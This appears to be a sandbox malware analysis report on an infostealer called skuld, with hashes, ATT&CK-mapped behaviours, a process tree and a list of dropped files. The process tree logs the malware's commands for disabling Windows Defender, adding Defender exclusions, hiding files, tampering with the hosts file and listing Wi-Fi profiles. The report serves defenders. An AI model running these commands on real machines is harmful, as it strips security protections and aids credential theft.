Analysis

  • max time kernel
    150s
  • max time network
    104s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25-07-2024 09:39

General

  • Target

    skuld-main.exe

  • Size

    3.9MB

  • MD5

    aa6ab61ffec1cadb1f1fb9e409434d23

  • SHA1

    36d9bcca5162c35b0d12955c22bd913a91f20d61

  • SHA256

    fd27388ee0e064cc6c28557ced21dd581e98938449e1fa90e77de6961665f8db

  • SHA512

    f0017002feb946a901ac363e60f87ed175926992a4369a1fa1b59ccea1e36d46b5488a76c035566605f4388b015d4e9239c0d968c83b9399efd19e96818d0c52

  • SSDEEP

    98304:tx64YRFYsecOWle37HUjioDRo/Kjaf2kSsTUGqgytme:j2n2xtoDi/KxkSsoGxytD

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to or copy of a web browser credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses the default user-agent string defined by the GoLang HTTP packages.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\skuld-main.exe
    "C:\Users\Admin\AppData\Local\Temp\skuld-main.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2272
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\helper.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:416
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.sfx.exe
        skuld.sfx.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4564
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe"
          4⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4292
          • C:\Windows\system32\attrib.exe
            attrib +h +s C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
            5⤵
            • Views/modifies file attributes
            PID:4424
          • C:\Windows\system32\attrib.exe
            attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
            5⤵
            • Views/modifies file attributes
            PID:3596
          • C:\Windows\System32\Wbem\wmic.exe
            wmic csproduct get UUID
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1760
          • C:\Windows\System32\Wbem\wmic.exe
            wmic path win32_VideoController get name
            5⤵
            • Detects videocard installed
            • Suspicious use of AdjustPrivilegeToken
            PID:3048
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2280
          • C:\Windows\System32\Wbem\wmic.exe
            wmic os get Caption
            5⤵
            PID:3952
          • C:\Windows\System32\Wbem\wmic.exe
            wmic cpu get Name
            5⤵
            PID:948
          • C:\Windows\System32\Wbem\wmic.exe
            wmic path win32_VideoController get name
            5⤵
            • Detects videocard installed
            PID:1824
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:388
          • C:\Windows\System32\Wbem\wmic.exe
            wmic csproduct get UUID
            5⤵
            PID:1236
          • C:\Windows\system32\attrib.exe
            attrib -r C:\Windows\System32\drivers\etc\hosts
            5⤵
            • Drops file in Drivers directory
            • Views/modifies file attributes
            PID:4600
          • C:\Windows\system32\attrib.exe
            attrib +r C:\Windows\System32\drivers\etc\hosts
            5⤵
            • Drops file in Drivers directory
            • Views/modifies file attributes
            PID:3608
          • C:\Windows\system32\netsh.exe
            netsh wlan show profiles
            5⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:5044
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1740
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\il5gzbhx\il5gzbhx.cmdline"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2528
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF44.tmp" "c:\Users\Admin\AppData\Local\Temp\il5gzbhx\CSCD238C4656F24D5688C2A38E1C9280B9.TMP"
                7⤵
                PID:4792

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    6d3e9c29fe44e90aae6ed30ccf799ca8

    SHA1

    c7974ef72264bbdf13a2793ccf1aed11bc565dce

    SHA256

    2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

    SHA512

    60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    15dde0683cd1ca19785d7262f554ba93

    SHA1

    d039c577e438546d10ac64837b05da480d06bf69

    SHA256

    d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

    SHA512

    57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

  • C:\Users\Admin\AppData\Local\Temp\RESDF44.tmp

    Filesize

    1KB

    MD5

    a1e8e76c8979f3a71518e1f7c040bd6e

    SHA1

    686c19cd1f66d7b6a4ba0558242e8239a5e60c25

    SHA256

    7af460dd0655443f81a9cbe612f65bfef8cb75500bd9fb0efccf0f57ed7bf0df

    SHA512

    b10e6ccbf81002d2c4ee22885b08320071e5fa9149cba826f3420c8568001d0fd1bb591a5b7110da9cb998a4f1dc78be8257e880c7edd1f0bc8db4b6fd5be363

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\helper.bat

    Filesize

    19B

    MD5

    d26173d979a9427cb2d59478382db58b

    SHA1

    6a4834c27726aebad506434465485dbf594b92c2

    SHA256

    78b08486655044ecdbb7d710b895830469ba8ca48ee4bc32b721e83f0f4f2905

    SHA512

    04f3ddab7158e5faa4eefc84fc90ca7669d34fbd6770f4debb03bc582267000599a24f619b383efa719cc7bf64e2a845316167389ea3b92471dda659202621c5

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe

    Filesize

    9.5MB

    MD5

    8b072fa6dc2293e8fc4c79a4c9186886

    SHA1

    dc62f8da50e79c32042523062bfaa12f3179c796

    SHA256

    72614853b5345d3672df3e26a1ad39df61c87d882e40503651a9f237472c018d

    SHA512

    77346cbde03e6b1c60c776f5365ed24c784291b3b89ca21d1f0ccdc7c0a7e24e6a0816373d95ccea9f172e30a674726ea7fae48cd35c7c2dd4ca1a909a9e1636

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.sfx.exe

    Filesize

    3.7MB

    MD5

    c22852523a7ecfc152e31ab535e02fd2

    SHA1

    bfd7e15bb7a0ab28b7a6b21124bc963dc09ecbb8

    SHA256

    a94ea7310ba474d5e22faf966dc930915b18d2d54178f2ae31af20156ea9360a

    SHA512

    eaceef152e9fdcea1a2b04ad0bc828dd72ea90b703466c65baf5ba04391c628acd5509c79801019fc779105b0ae27c62f84b5a259e20ad8bcaf014bce519e246

  • C:\Users\Admin\AppData\Local\Temp\Z0vTmiVWyX\Display (1).png

    Filesize

    423KB

    MD5

    b2578958fcb784942dedb3e4798b8cd6

    SHA1

    e1f81dcbf299ffd09c753410cf4f1663ca7a33b4

    SHA256

    d9278db857df44c21b562d2aa3538bd322da41601c449418c412af139c5e13c6

    SHA512

    c8a0b9bd2e5d8f189598758a45fca4e90996102ea035a4b51247751e3e730b471e11b0a1ec809aff0c1ea749acd9ef46a99174bc0a55cc1606dd452827c5af44

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kkxn0nwc.mld.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\il5gzbhx\il5gzbhx.dll

    Filesize

    4KB

    MD5

    3167df3d4dcf9c2dd82696ec2a15de62

    SHA1

    4b3015bd6d76a7f21c9d48b8cccd1c56b79d0dd6

    SHA256

    cfa2842a07dbca9617dfe636be898a66a6fe3717a9db6394ce9ce278891b7c09

    SHA512

    babfd3cd8e0c2e5f194a1314d3732039228d3b6df127a1ecef710570c39ec6676f033bad1eb2b2bf798404839b7703c6ee9759b42d8ef14739224d7480e9a4dc

  • C:\Windows\System32\drivers\etc\hosts

    Filesize

    2KB

    MD5

    6e2386469072b80f18d5722d07afdc0b

    SHA1

    032d13e364833d7276fcab8a5b2759e79182880f

    SHA256

    ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

    SHA512

    e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

  • \??\c:\Users\Admin\AppData\Local\Temp\il5gzbhx\CSCD238C4656F24D5688C2A38E1C9280B9.TMP

    Filesize

    652B

    MD5

    0c60e3bb5fc4b7df4a75d4423edf3d91

    SHA1

    c9f464f39e1b2ec98298ceab0e145f36807f0496

    SHA256

    57e21339ee8fa9e8d6a41d6b7891c2ac6d9ee76f5e9fa0aa98f0cf116b3faa47

    SHA512

    216d43c329b6111d198d310fd50d558efc746707175fe63234f7875243fdcd3eab279c3f35619ffc67717bde628302c8231fe4638351a30a5765f112b7f9abdd

  • \??\c:\Users\Admin\AppData\Local\Temp\il5gzbhx\il5gzbhx.0.cs

    Filesize

    1004B

    MD5

    c76055a0388b713a1eabe16130684dc3

    SHA1

    ee11e84cf41d8a43340f7102e17660072906c402

    SHA256

    8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

    SHA512

    22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

  • \??\c:\Users\Admin\AppData\Local\Temp\il5gzbhx\il5gzbhx.cmdline

    Filesize

    607B

    MD5

    e92a6272867a9ddf5ce2bc519395d829

    SHA1

    45a1ae484b31ebd34435896032f3b187723e3612

    SHA256

    636b2411a7965343160ace04ce0d61d7ab23e22efc7977d758298624fb06879d

    SHA512

    07f9a58c6700b591bba98fe4df363365504f9ed2939df0c65084e8ad81b8721a088d906d73d598f0ff8f55626d01c3fd7478e2e36735265e04d895e3fa3d8f24

  • memory/1740-80-0x000001EEB0710000-0x000001EEB0718000-memory.dmp

    Filesize

    32KB

  • memory/2280-22-0x0000027BD8DC0000-0x0000027BD8DE2000-memory.dmp

    Filesize

    136KB